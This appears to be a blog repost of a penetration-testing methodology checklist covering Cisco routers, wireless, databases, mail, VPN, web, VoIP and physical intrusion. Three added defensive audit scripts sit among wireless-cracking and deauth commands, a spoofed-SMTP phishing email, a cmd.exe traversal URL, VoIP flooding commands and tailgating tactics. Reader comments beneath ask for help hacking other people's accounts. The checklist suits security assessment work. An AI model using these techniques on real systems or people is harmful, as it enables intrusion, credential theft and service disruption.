# Type 5 password protection is much more secure. However, should an attacker get hold of the configuration file somehow, then the MD5 hash can be extracted and cracked offline with the following tools:
* Cain
* John the Ripper
o Entered into a text file as follows: username:$1$c2He$GWSkN1va8NJd2icna9TDA.
o Sample running-config file (Cisco 2600, IOS 12.2):

version 12.2
service config
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
!
hostname vapt-router
!
logging queue-limit 100
enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.
enable password router
!
memory-size iomem 10
ip subnet-zero
no ip routing
!

ip audit notify log
ip audit po max-events 100
!
no voice hpi capture buffer
no voice hpi capture destination
!
mta receive maximum-recipients 0

!
interface Ethernet0/0
ip address 10.1.1.175 255.255.255.0
no ip route-cache
no ip mroute-cache
half-duplex
!
interface Serial0/0
no ip address
no ip route-cache
no ip mroute-cache
shutdown
!
ip http server
no ip http secure-server
ip classless
!

snmp-server community Cisco RO
snmp-server community enable RW
snmp-server enable traps tty
call rsvp-sync
!
mgcp profile default
!
dial-peer cor custom
!
line con 0
line aux 0
line vty 0 4
password telnet
login
!
end
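The weaknesses the explanation above walks through (a clear-text or type 7 enable password, clear-text VTY credentials, read-write and guessable SNMP communities, the plain-HTTP management server that the HTTP Arbitrary Access entry depends on) can be checked mechanically against a saved configuration. The following script is an added example written for this edit; it is not part of the Penetration Testing Framework or of any Cisco tool. It parses the page's sample running-config (abridged inline to the stanzas it inspects) and reports each finding. The WEAK_COMMUNITIES set and the finding identifiers are the example's own constructions.

```python
"""Audit a Cisco IOS running-config for the weaknesses described above.

Example code added by the editor, not part of the Penetration Testing
Framework. SAMPLE_CONFIG is the page's own sample running-config,
abridged to the stanzas the checks inspect; WEAK_COMMUNITIES is a
constructed list of community strings commonly left at their defaults.
"""
import re

SAMPLE_CONFIG = """\
version 12.2
no service password-encryption
!
hostname vapt-router
!
enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.
enable password router
!
ip http server
no ip http secure-server
!
snmp-server community Cisco RO
snmp-server community enable RW
!
line con 0
line aux 0
line vty 0 4
password telnet
login
!
end
"""

WEAK_COMMUNITIES = {"public", "private", "cisco", "enable"}


def parse_line_blocks(lines):
    """Group 'line con/aux/vty' stanzas with the commands under them.

    A stanza ends at '!', 'end', a blank line or the next 'line' keyword,
    so this works for indented IOS output and for the flattened copy above.
    """
    blocks = {}
    current = None
    for raw in lines:
        s = raw.strip()
        if s.startswith("line "):
            current = s
            blocks[current] = []
        elif s in ("!", "end", ""):
            current = None
        elif current is not None:
            blocks[current].append(s)
    return blocks


def audit_config(text):
    """Return (severity, finding_id, message) tuples for one config."""
    findings = []
    lines = [l.strip() for l in text.splitlines()]

    if "no service password-encryption" in lines:
        findings.append(("medium", "password-encryption",
                         "service password-encryption is off: line passwords are stored in clear text"))
    if "ip http server" in lines:
        findings.append(("high", "http-server",
                         "plain-HTTP management interface enabled (ip http server)"))

    for s in lines:
        m = re.match(r"enable password(?: (\d))? (\S+)$", s)
        if m:
            if m.group(1) == "7":
                findings.append(("high", "enable-type7",
                                 "enable password uses type 7 (reversible Vigenere) encoding"))
            elif m.group(1) is None:
                findings.append(("high", "enable-cleartext",
                                 "enable password stored in clear text"))
        if re.match(r"enable secret 5 \$1\$", s):
            findings.append(("info", "enable-type5",
                             "enable secret is type 5 (MD5); crackable offline if the config leaks, so guard config backups"))
        m = re.match(r"snmp-server community (\S+) (RO|RW)\b", s)
        if m:
            name, mode = m.groups()
            if mode == "RW":
                findings.append(("high", "snmp-rw",
                                 "read-write SNMP community '%s' configured" % name))
            if name.lower() in WEAK_COMMUNITIES:
                findings.append(("medium", "snmp-weak",
                                 "guessable SNMP community '%s'" % name))

    for name, cmds in parse_line_blocks(lines).items():
        if not name.startswith("line vty"):
            continue
        for c in cmds:
            m = re.match(r"password(?: (\d))? (\S+)$", c)
            if m and m.group(1) is None:
                findings.append(("high", "vty-cleartext",
                                 "%s login password stored in clear text" % name))
            elif m and m.group(1) == "7":
                findings.append(("high", "vty-type7",
                                 "%s login password uses reversible type 7 encoding" % name))
        if "transport input ssh" not in cmds:
            findings.append(("medium", "vty-telnet",
                             "%s allows Telnet (no 'transport input ssh')" % name))
    return findings


if __name__ == "__main__":
    for sev, fid, msg in audit_config(SAMPLE_CONFIG):
        print("[%-6s] %-20s %s" % (sev, fid, msg))
```

Run it against a saved `show running-config`. On the sample above it reports every weakness the text lists; a hardened config (enable secret only, `service password-encryption`, `login local` plus `transport input ssh` on the VTY lines, `no ip http server`) trims the output to the informational note about the type 5 hash. The audit only sees what is in the file, so treat it as a floor, not a clean bill of health.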
+ References.
# Cisco IOS Exploitation Techniques
o Wireless Penetration
+ Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry the assessment out.
# Site Map
* RF Map
o Lines of Sight
o Signal Coverage
+ Standard Antenna
+ Directional Antenna
* Physical Map
o Triangulate APs
o Satellite Imagery
# Network Map
* MAC Filter
o Authorised MAC Addresses
o Reaction to Spoofed MAC Addresses
* Encryption Keys utilised
o WEP
+ Key Length
# Crack Time
# Key
o WPA/PSK
+ TKIP
# Temporal Key Integrity Protocol (TKIP) is an encryption protocol designed to replace WEP
* Key
* Attack Time
+ AES
# Advanced Encryption Standard (AES) is an encryption algorithm utilised for securing sensitive data.
* Key
* Attack Time
o 802.1x
+ Derivative of 802.1x in use
* Access Points
o ESSID
+ Extended Service Set Identifier (ESSID). Utilised on wireless networks with an access point
# Broadcast ESSIDs
o BSSIDs
+ Basic Service Set Identifier (BSSID), utilised on ad-hoc wireless networks.
# Vendor
# Channel
# Associations
# Rogue AP Activity
* Wireless Clients
o MAC Addresses
+ Vendor
+ Operating System Details
+ Adhoc Mode
+ Associations
o Intercepted Traffic
+ Encrypted
+ Clear Text
+ Wireless Toolkit
# Wireless Discovery
* Aerosol
* Airfart
* Aphopper
* Apradar
* BAFFLE
* karma
* Kismet
* MiniStumbler
* Netstumbler
* Wellenreiter
* Wifi Hopper
* WirelessMon
# Packet Capture
* Airopeek
* Airtraf
* Apsniff
* Cain
* Wireshark
# EAP Attack tools
* eapmd5pass
o eapmd5pass -w dictionary_file -r eapmd5-capture.dump
o eapmd5pass -w dictionary_file -U username -C EAP-MD5_Challenge_value -R EAP-MD5_Response_value -E EAP-MD5_Response_EAP_ID_value, i.e.
  -C e4:ef:ff:cf:5a:ea:44:7f:9a:dd:4f:3b:0e:f4:4d:20 -R 1f:fd:6c:46:49:bc:5d:b9:11:24:cd:02:cb:22:6d:37 -E 2
# Leap Attack Tools
* asleap
* thc leap cracker
* anwrap
# WEP/ WPA Password Attack Tools
* Aircrack-ptw
* Aircrack-ng
* Aircrack
* Airsnort
* cowpatty
* wep attack
* wep crack
* Airbase
* wzcook
# Frame Generation Software
* Airgobbler
* airpwn
* Airsnarf
* Commview
* fake ap
* void 11
* wifi tap
o wifitap -b [-o ] [-i [-p] [-w [-k ]] [-d [-v]] [-h]
* FreeRADIUS – Wireless Pwnage Edition
# Mapping Software
* Knsgem
# File Format Conversion Tools
* ns1 recovery and conversion tool
* warbable
* warkizniz
o warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
* ivstools
# IDS Tools
* WIDZ
* War Scanner
* Snort-Wireless
* AirDefense
* AirMagnet
+ WLAN discovery
# Unencrypted WLAN
* Visible SSID
o Sniff for IP range
+ MAC authorised
+ MAC filtering
# Spoof valid MAC
* Linux
o ifconfig [interface] hw ether [MAC]
* macchanger
o Random Mac Address:- macchanger -r eth0
* mac address changer for windows
* madmacs
* TMAC
* SMAC
* Hidden SSID
o Deauth client
+ Aireplay-ng
# aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]
+ Commview
# Tools > Node reassociation
+ Void11
# void11_penetration wlan0 -D -t 1 -B [MAC]
# WEP encrypted WLAN
* Visible SSID
o WEPattack
+ wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]
# Capture / Inject packets
* Break WEP
o Aircrack-ptw
+ aircrack-ptw [pcap file]
o Aircrack-ng
+ aircrack -q -n [WEP key length] -b [BSSID] [pcap file]
o Airsnort
+ Channel > Start
o WEPcrack
+ perl WEPCrack.pl
+ ./pcap-getIV.pl -b 13 -i wlan0
* Hidden SSID
o Deauth client
+ Aireplay-ng
# aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]
+ Commview
# Tools > Node reassociation
+ Void11
# void11_hopper
# void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]
# WPA / WPA2 encrypted WLAN
* Deauth client
o Capture EAPOL handshake
+ WPA / WPA2 dictionary attack
# coWPAtty
* ./cowpatty -r [pcap file] -f [wordlist] -s [SSID]
* ./genpmk -f dictionary_file -d hashfile_name -s ssid
* ./cowpatty -r capture_file.cap -d hashfile_name -s ssid
# Aircrack-ng
* aircrack-ng -a 2 -w [wordlist] [pcap file]
# LEAP encrypted WLAN
* Deauth client
o Break LEAP
+ asleap
# ./asleap -r data/libpcap_packet_capture_file.dump -f output_pass+hash_file.dat -n output_index_filename.idx
# ./genkeys -r dictionary_file -f output_pass+hash_file.dat -n output_index_filename.idx
+ THC-LEAPcracker
# leap-cracker -f [wordlist] -t [NT challenge response] -c [challenge]
# 802.1x WLAN
* Create Rogue Access Point
o Airsnarf
+ Deauth client
# Associate client
* Compromise client
o Acquire passphrase / certificate
+ wzcook
+ Obtain user’s certificate
o fake ap
+ perl fakeap.pl --interface wlan0
+ perl fakeap.pl --interface wlan0 --channel 11 --essid fake_name --wep 1 --key [WEP KEY]
o Hotspotter
+ Deauth client
# Associate client
* Compromise client
o Acquire passphrase / certificate
+ wzcook
+ Obtain user’s certificate
o Karma
+ Deauth client
# Associate client
* Compromise client
o Acquire passphrase / certificate
+ wzcook
+ Obtain user’s certificate
+ ./bin/karma etc/karma-lan.xml
o Linux rogue AP
+ Deauth client
# Associate client
* Compromise client
o Acquire passphrase / certificate
+ wzcook
+ Obtain user’s certificate
# Resources
* URLs
o Wirelessdefence.org
o Russix
o Wardrive.net
o Wireless Vulnerabilities and Exploits (WVE)
* White Papers
o Weaknesses in the Key Scheduling Algorithm of RC4
o 802.11b Firmware-Level Attacks
o Wireless Attacks from an Intrusion Detection Perspective
o Implementing a Secure Wireless Network for a Windows Environment
o Breaking 104 bit WEP in less than 60 seconds
o PEAP Shmoocon2008 Wright & Antoniewicz
o Active behavioral fingerprinting of wireless devices
* Common Vulnerabilities and Exploits (CVE)
o Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
* Server Specific Tests
o Databases
+ Direct Access Interrogation
# MS SQL Server
* Ports
o UDP
o TCP
* Version
o SQL Server Resolution Service (SSRS)
o Other
* osql
o Attempt default/common accounts
o Retrieve data
o Extract sysxlogins table
# Oracle
* Ports
o UDP
o TCP
* TNS Listener
o VSNUM Converted to hex
o Ping / version / status / debug / reload / services / save_config / stop
o Leak attack
* SQL Plus
* Default Account/Passwords
* Default SIDs
# MySQL
* Ports
o UDP
o TCP
* Version
* Users/Passwords
o mysql.user
# DB2
# Informix
# Sybase
# Other
+ Scans
# Default Ports
# Non-Default Ports
# Instance Names
# Versions
+ Password Attacks
# Sniffed Passwords
* Cracked Passwords
* Hashes
# Direct Access Guesses
+ Vulnerability Assessment
# Automated
* Reports
* Vulnerabilities
o Severe
o High
o Medium
o Low
# Manual
* Patch Levels
o Missing Patches
* Confirmed Vulnerabilities
o Severe
o High
o Medium
o Low
o Mail
+ Scans
+ Fingerprint
# Manual
# Automated
+ Spoofable
# Telnet spoof
* telnet target_IP 25

helo target.com
mail from: XXXX@XXX.com
rcpt to: administrator@target.com
data
X-Sender: XXXX@XXX.com
X-Originating-IP: [192.168.1.1]
X-Originating-Email: [XXXX@XXX.com]
MIME-Version: 1.0
To:
From: < XXXX@XXX.com >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Dear Valued Customer,
The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
Please go to the following website and log in with your account details.
www.target.com/login
Online Security Manager.
Target Ltd
XXXX@XXX.com
.
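The spoof test above succeeds only when the receiving server accepts a session whose envelope, HELO and headers contradict each other. The script below, an added example written for this edit and not part of the framework, parses a client-side SMTP transcript of the same shape into its envelope and message and applies the checks a mail server or gateway can use to refuse or flag it: a HELO that claims the defended domain from an outside address, a header From whose domain differs from the envelope sender (the misalignment DMARC-style checks catch), an impersonated own-domain From header, and a private X-Originating-IP arriving from outside. Both sessions, the domain target.example, the partner domain example.net, and the addresses 203.0.113.5 and 10.1.1.0/24 are constructed for the example.

```python
"""Parse a client-side SMTP transcript like the one above and apply the
checks a receiving mail server can use to refuse or flag a spoofed
message. Example code added by the editor, not part of the framework.
The two sessions below are constructed; target.example stands in for the
defended domain, and 203.0.113.5 / 10.1.1.0/24 are documentation and
private ranges used as the constructed client address and "own" network.
"""
import ipaddress
import re
from email.parser import Parser
from email.utils import parseaddr

# Constructed spoof attempt mirroring the telnet session above: an outside
# host greets as our own domain and writes a From header in that domain.
SPOOF_SESSION = """\
helo target.example
mail from: bounce@example.net
rcpt to: administrator@target.example
data
X-Sender: bounce@example.net
X-Originating-IP: [192.168.1.1]
MIME-Version: 1.0
To: administrator@target.example
From: Online Security Manager <security@target.example>
Subject: Important! Account check required
Content-Type: text/plain

Please log in with your account details at www.target.example/login
.
"""

# Constructed legitimate inbound message from a partner domain.
LEGIT_SESSION = """\
helo mail.example.net
mail from: newsletter@example.net
rcpt to: administrator@target.example
data
From: Partner News <newsletter@example.net>
To: administrator@target.example
Subject: Monthly update

Nothing suspicious here.
.
"""

OUR_DOMAIN = "target.example"
OUR_NETWORKS = [ipaddress.ip_network("10.1.1.0/24")]


def _addr(s):
    """Pull the bare address out of 'Name <addr>' or '<addr>' or 'addr'."""
    m = re.search(r"<([^>]+)>", s)
    return (m.group(1) if m else s).strip().lower()


def _domain(addr):
    return addr.rsplit("@", 1)[1] if "@" in addr else ""


def parse_session(text):
    """Split the transcript into the SMTP envelope and the parsed message."""
    env = {"helo": "", "mail_from": "", "rcpt_to": []}
    lines = text.splitlines()
    data_at = len(lines)
    for i, line in enumerate(lines):
        cmd, low = line.strip(), line.strip().lower()
        if low.startswith(("helo ", "ehlo ")):
            env["helo"] = cmd.split(None, 1)[1].lower()
        elif low.startswith("mail from:"):
            env["mail_from"] = _addr(cmd.split(":", 1)[1])
        elif low.startswith("rcpt to:"):
            env["rcpt_to"].append(_addr(cmd.split(":", 1)[1]))
        elif low == "data":
            data_at = i
            break
    body = []
    for line in lines[data_at + 1:]:
        if line == ".":          # end-of-data marker
            break
        body.append(line)
    return env, Parser().parsestr("\n".join(body))


def check_session(text, client_ip, our_domain=OUR_DOMAIN, our_networks=OUR_NETWORKS):
    """Return the policy findings for one session received from client_ip."""
    env, msg = parse_session(text)
    ip = ipaddress.ip_address(client_ip)
    internal = any(ip in net for net in our_networks)
    findings = []
    # Our own domain in HELO from an outside address is a classic forgery
    # sign (the kind of rule an MTA's HELO access map enforces).
    if env["helo"] == our_domain and not internal:
        findings.append("helo-claims-own-domain")
    header_from = parseaddr(msg.get("From", ""))[1].lower()
    # Envelope sender and header From in different domains: the
    # misalignment that DMARC-style checks are designed to catch.
    if _domain(header_from) != _domain(env["mail_from"]):
        findings.append("from-header-envelope-mismatch")
    if _domain(header_from) == our_domain and not internal:
        findings.append("header-from-impersonates-own-domain")
    orig = msg.get("X-Originating-IP", "").strip("[] ")
    try:
        if ipaddress.ip_address(orig).is_private and not internal:
            findings.append("private-originating-ip-from-outside")
    except ValueError:
        pass                     # header absent or not an IP address
    return findings


if __name__ == "__main__":
    print("spoof:", check_session(SPOOF_SESSION, "203.0.113.5"))
    print("legit:", check_session(LEGIT_SESSION, "203.0.113.9"))
```

The same spoof session checked with an internal client address yields only the envelope/header mismatch, which is why the network position of the sender has to be part of the decision. In production these rules are what SPF, DKIM and DMARC formalize; the script shows the logic rather than replacing them.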
+ Relays
o VPN
+ Scanning
# 500 UDP IPSEC
# 1723 TCP PPTP
# 443 TCP/SSL
# nmap -sU -P0 -p 500 80.75.68.22-27
# ipsecscan 80.75.68.22 80.75.68.27
+ Fingerprinting
# ike-scan --showbackoff 80.75.68.22 80.75.68.27
+ PSK Crack
# ikeprobe 80.75.68.27
# sniff for responses with C&A or ikecrack
o Web
+ Vulnerability Assessment
# Automated
* Reports
* Vulnerabilities
o Severe
o High
o Medium
o Low
# Manual
* Patch Levels
o Missing Patches
* Confirmed Vulnerabilities
o Severe
o High
o Medium
o Low
+ Permissions
# PUT /test.txt HTTP/1.0
# CONNECT mail.another.com:25 HTTP/1.0
# POST http://mail.another.com:25/ HTTP/1.0
Content-Type: text/plain
Content-Length: 6
+ Scans
+ Fingerprinting
# Other
# HTTP
* Commands
o JUNK / HTTP/1.0
o HEAD / HTTP/9.3
o OPTIONS / HTTP/1.0
o HEAD / HTTP/1.0
o GET /images HTTP/1.0
o PROPFIND / HTTP/1.0
* Modules
o WebDAV
o ASP.NET
o Frontpage
o OWA
o IIS ISAPI
o PHP
o OpenSSL
* File Extensions
o .ASP, .HTM, .PHP, .EXE, .IDQ
# HTTPS
* Commands
o JUNK / HTTP/1.0
o HEAD / HTTP/9.3
o OPTIONS / HTTP/1.0
o HEAD / HTTP/1.0
* File Extensions
o .ASP, .HTM, .PHP, .EXE, .IDQ
+ Directory Traversal
# http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:
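Two of the URL patterns on this page are easy to recognise in web-server logs once the path is normalised: the double-encoded traversal just above (`..%255c..` only becomes `..\..` after two rounds of percent-decoding, which is how it slipped past filters that decoded once) and the Cisco IOS privilege-level URLs (`/level/NN/exec/...`) from the HTTP Arbitrary Access entry earlier on the page. The script below is an added example written for this edit, not part of the framework; it decodes each request path until it stops changing, checks whether the `..` segments would climb out of the document root, and tags level URLs in the 16-99 range the text singles out. The log lines are constructed in Common Log Format using documentation addresses (192.0.2.0/24).

```python
"""Flag the two URL-borne attack patterns this framework shows in
web-server access logs: the double-encoded directory traversal above
(..%255c..) and Cisco IOS HTTP privilege-level URLs (/level/NN/exec...,
from the Cisco section of the page). Example code added by the editor,
not part of the framework; the log lines are constructed and use
documentation addresses (192.0.2.0/24).
"""
import re
from urllib.parse import unquote

# Constructed sample in Common Log Format: one benign request, one
# double-encoded traversal, one IOS level-99 request, one harmless '..'
# that stays inside the docroot, and one request for the legitimate level 15.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2008:13:55:36 +0000] "GET /images/logo.gif HTTP/1.0" 200 2326
192.0.2.11 - - [10/Oct/2008:13:55:40 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 200 512
192.0.2.12 - - [10/Oct/2008:13:56:01 +0000] "GET /level/99/exec/show/config HTTP/1.0" 200 4096
192.0.2.13 - - [10/Oct/2008:13:56:05 +0000] "GET /docs/../index.html HTTP/1.0" 200 1024
192.0.2.14 - - [10/Oct/2008:13:56:09 +0000] "GET /level/15/exec/- HTTP/1.0" 401 0
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
LEVEL_RE = re.compile(r"^/level/(\d+)/")
DOUBLE_ENC_RE = re.compile(r"%25[0-9a-fA-F]{2}")


def normalize_path(raw):
    """Drop the query string, percent-decode until the result stops
    changing (so %255c -> %5c -> '\\'), and treat '\\' as a separator."""
    path = raw.split("?", 1)[0]
    for _ in range(5):  # bounded: nested encodings cannot loop forever
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def escapes_root(path):
    """True if resolving '..' would climb above the document root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(raw_path):
    """Return the list of tags that apply to one request path."""
    tags = []
    if DOUBLE_ENC_RE.search(raw_path.split("?", 1)[0]):
        tags.append("double-encoding")
    path = normalize_path(raw_path)
    if escapes_root(path):
        tags.append("traversal")
    m = LEVEL_RE.match(path)
    if m:
        tags.append("ios-level-url")
        # Levels 16-99 are the range the text says the bypass used;
        # level 15 is ordinary privileged EXEC and still needs a login.
        if 16 <= int(m.group(1)) <= 99:
            tags.append("ios-arbitrary-access")
    return tags


def scan_log(text):
    """Return one dict per suspicious request, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, method, path, status = m.groups()
        tags = classify(path)
        if tags:
            hits.append({"src": src, "method": method, "path": path,
                         "status": int(status), "tags": tags})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print("%s %s %s -> %s (%d)" % (h["src"], h["method"], h["path"],
                                       ",".join(h["tags"]), h["status"]))
```

The status code matters as much as the tag: a traversal or level-99 request answered with 200 is a likely compromise to investigate, while a 401 or 404 is an attempt worth blocking at the source. Note that the harmless `/docs/../index.html` is not flagged, because the normalised path never leaves the root.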
* Penetration – An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually, or various engines exist that are, at the lowest level, essentially pre-compiled point-and-shoot tools. These engines also have a number of other underlying features for more advanced users.
o Password Attacks
+ Known Accounts
# Identified Passwords
# Unidentified Hashes
+ Default Accounts
# Identified Passwords
# Unidentified Hashes
o Exploits
+ Successful Exploits
# Accounts
* Passwords
o Cracked
o Uncracked
* Groups
* Other Details
# Services
# Backdoor
# Connectivity
+ Unsuccessful Exploits
+ Resources
# Securiteam
* Exploits are sorted by year and must be downloaded individually
# SecurityForest
* Updated via CVS after initial install
# GovernmentSecurity
* Need to create an account to obtain access
# Red Base Security
* Oracle Exploit site only
# Wireless Vulnerabilities & Exploits (WVE)
* Wireless Exploit Site
# PacketStorm Security
* Exploits downloadable by month and year but no indexing carried out.
# SecWatch
* Exploits sorted by year and month, download separately
# SecurityFocus
* Exploits must be downloaded individually
# Metasploit
* Install and regularly update via svn
# Milw0rm
* Exploit archive indexed and sorted by port, download as a whole – The one to go for!
o Tools
+ Metasploit
# Free Extra Modules
* local copy
+ Manual SQL Injection
# Understanding SQL Injection
# SQL Injection walkthrough
# SQL Injection by example
# Blind SQL Injection
# Advanced SQL Injection in SQL Server
# More Advanced SQL Injection
# Advanced SQL Injection in Oracle databases
# SQL Cheatsheets
* http://ha.ckers.org/sqlinjection
* http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
* http://www.0x000000.com/?i=14
* http://pentestmonkey.net/
+ SQL Power Injector
+ SecurityForest
+ SPI Dynamics WebInspect
+ Core Impact
+ Cisco Global Exploiter
+ PIXDos
# perl PIXdos.pl [--device=interface] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]
+ CANVAS
+ Inguma
* VoIP Security
o Sniffing Tools
+ AuthTool
+ Cain & Abel
+ Etherpeek
+ NetDude
+ Oreka
+ PSIPDump
+ SIPomatic
+ SIPv6 Analyzer
+ VoiPong
+ VOMIT
+ Wireshark
+ WIST – Web Interface for SIP Trace
o Scanning and Enumeration Tools
+ enumIAX
+ fping
+ IAX Enumerator
+ iWar
+ Nessus
+ Nmap
+ SIP Forum Test Framework (SFTF)
+ SIPcrack
+ SIP-Scan
+ SIP.Tastic
+ SiVuS
+ SMAP
+ snmpwalk
+ VLANping
+ VoIPAudit
o Packet Creation and Flooding Tools
+ H.323 Injection Files
+ H225regreject
+ IAXHangup
+ IAXAuthJack
+ IAX.Brute
+ IAXFlooder
# ./iaxflood sourcename destinationname numpackets
+ INVITE Flooder
# ./inviteflood interface target_user target_domain ip_address_target no_of_packets
+ kphone-ddos
+ RTP Flooder
+ rtpbreak
+ Scapy
+ Seagull
+ SIPBomber
+ SIPNess
+ SIPp
+ SIPsak
+ SIP-Send-Fun
+ Spitter
+ TFTP Brute Force
# perl tftpbrute.pl
+ UDP Flooder
# ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
+ UDP Flooder (with VLAN Support)
# ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN_ID no_of_packets
+ Voiphopper
o Fuzzing Tools
+ Asteroid
+ Codenomicon VoIP Fuzzers
+ Fuzzy Packet
+ Mu Security VoIP Fuzzing Platform
+ ohrwurm RTP Fuzzer
+ PROTOS H.323 Fuzzer
+ PROTOS SIP Fuzzer
+ SIP Forum Test Framework (SFTF)
+ Sip-Proxy
+ Spirent ThreatEx
o Signaling Manipulation Tools
+ AuthTool
# ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
+ BYE Teardown
+ Check Sync Phone Rebooter
+ RedirectPoison
# ./redirectpoison interface target_source_ip target_source_port ""
+ Registration Adder
+ Registration Eraser
+ Registration Hijacker
+ SIP-Kill
+ SIP-Proxy-Kill
+ SIP-RedirectRTP
+ SipRogue
+ vnak
o Media Manipulation Tools
+ RTP InsertSound
# ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
+ RTP MixSound
# ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
+ RTPProxy
+ RTPInject
o References
+ URLs
# Hacking Exposed VoIP
* Tool Pre-requisites
o Hack Library
o g711conversions
# VoIPsa
# Common Vulnerabilities and Exploits (CVE)
* Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
+ White Papers
# An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
# An Analysis of VoIP Security Threats and Tools
# Hacking VoIP Exposed
# Hacking VoIP Wired and Wireless Phones
# Security testing of SIP implementations
# SIP Stack Fingerprinting and Stack Difference Attacks
# Two attacks against VoIP
# VoIP Attacks!
# VoIP Security Audit Program (VSAP)
* Physical Security
o Building Security
+ Meeting Rooms
# Check for active network jacks.
# Check for any information in room.
+ Lobby
# Check for active network jacks.
# Does receptionist/guard leave lobby?
# Accessible printers? Print test page.
# Obtain phone/personnel listing.
+ Communal Areas
# Check for active network jacks.
# Check for any information in room.
# Listen for employee conversations.
+ Room Security
# Resistance of lock to picking.
* What type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?
# Ceiling access areas.
* Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
+ Windows
# Check windows/doors for visible intruder alarm sensors.
# Check visible areas for sensitive information.
# Can you video users logging on?
o Perimeter Security
+ Fence Security
# Attempt to verify that the whole of the perimeter fence is unbroken.
+ Exterior Doors
# If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.
+ Guards
# Patrol Routines
* Analyse patrol timings to ascertain if any holes exist in the coverage.
# Communications
* Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.
o Entry Points
+ Guarded Doors
# Piggybacking
* Attempt to closely follow employees into the building without having to show valid credentials.
# Fake ID
* Attempt to use fake ID to gain access.
# Access Methods
* Test ‘out of hours’ entry methods
+ Unguarded Doors
# Identify all unguarded entry points.
* Are doors secured?
* Check locks for resistance to lock picking.
+ Windows
# Check windows/doors for visible intruder alarm sensors.
* Attempt to bypass sensors.
# Check visible areas for sensitive information.
o Office Waste
+ Dumpster Diving. Attempt to retrieve any useful information from ToE refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.


Comments

26 Responses to “The process [How to Hack] By Kevin Orrey”
  1. arunim says:

    Nice info..

    readers should also check..

    How surfers find their way in times of war to restricted or censored sites
    http://www.rediff.com/netguide/2003/apr/03block.htm

    regards,
    arunim

  2. AlexM says:

    Your blog is interesting!

    Keep up the good work!

  3. prodj says:

    hey how can i hack some ones mocospace profile ?? …. plzzzzz plzzzz plzzzzz plzzzz reply soon :(

  4. Sarthak says:

    Hey I need to get my girlfriends yahoo pass.pls help me………….

  5. Moco-bug says:

    I also want to hack into mocospace account. Its urgent. Contact at: mocobug@gmail.com

  6. vijay bansal says:

    how can i hack yahoo id and password….?

  7. sandra742 says:

    Hi! I was surfing and found your blog post… nice! I love your blog. :) Cheers! Sandra. R.

  8. Gangster96 says:

    They promise to be faithful in religious duties, treasure their American heritage, to help others and to seek truth and fairness. ,

  9. Faggot41 says:

    This committee, in turn, works with a task force whose members have experience in specific issues to plan annual projects. ,

  10. Jude Odosa says:

    i need ebook on ethical hacking

  11. sumit anand says:

    i wanna know many things like:->
    i) How to hack/get yahoo & rediff ID’s password
    ii) How to see the videos n photos n scraps in orkut which is locked.

  12. sumit anand says:

    i wanna know many things like:->
    i) How to hack/get yahoo & rediff ID’s password
    ii) How to see the videos n photos n scraps in orkut which is locked.

    i wants a book on ethical hacking

  13. seriously, this blog is awesome . I think im gonna stick around and read a couple of your posts. Take it easy

  14. nena says:

    help me to hack a mocospace account, plizz

  15. randome says:

    pathetic and sad!
    what the hell is wrong with u guys!

  16. carmen says:

    i would love to know too how to hack a mocospace profile:):? if u can get at me:p

  17. Very often I visit this blog. It very much is pleasant to me. Thanks the author

  18. keiren says:

    hey , am wanting to hack mocospace.com profiles to , could you msg me keiren-g-2009@live.co.uk

    if you no thanks

  19. Hey, came in from Bing. Bookmarking, see ya. :)

  20. mobilemafia says:

    It is very a pity to me, I can help nothing to you. I think, you will find the correct decision.
    I apologise, but, in my opinion, you are not right.
    I will know, many thanks for the information.
    I am assured, what is it was already discussed.
    In it something is and it is good idea. I support you.

  21. Daniel says:

    could some1 out there teach and guide and help me i have cain and abel and dats all??

  22. GOURAV SINGH says:

    HIII,
